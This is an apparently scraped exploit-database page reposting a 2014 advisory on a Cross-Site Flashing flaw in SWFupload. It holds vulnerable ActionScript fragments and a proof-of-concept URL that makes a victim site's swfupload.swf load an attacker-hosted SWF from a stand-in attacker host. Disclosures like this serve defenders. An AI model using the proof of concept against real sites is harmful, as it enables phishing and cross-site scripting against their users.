header-logo
Suggest Exploit
vendor:
SWFupload
by:
MindCracker - Team MaDLeeTs
7.5
CVSS
HIGH
Cross-Site Flashing (XSF)
N/A
CWE
Product Name: SWFupload
Affected Version From: All
Affected Version To: All
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux / Window
2014

SWFupload All Version XSF Vulnerability

XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting. As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value. The vulneralbe SWF will load any file.

Mitigation:

The best way to prevent XSF is to validate the input and filter the input.
Source

Exploit-DB raw data:

# Exploit Title: SWFupload All Version XSF Vulnerability
 
# Date: 25/01/2014
 
# Exploit Author: MindCracker - Team MaDLeeTs
 
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
 
# Verion : All

# Tested on: Linux / Window

#Description :

XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable 
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting

#Vulnerable Code :
            

ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);

  this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
         }
         catch(ex:Object)
         {
            this.SetButtonTextStyle("");
         }
         try
         {

As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file 

http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf

2.

ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText

{
            this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
         }
         catch(ex:Object)
         {
            this.SetButtonText("");
         }
         try
         {

#POC 

http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf

Navigation

Suggest Exploit

Services By CQR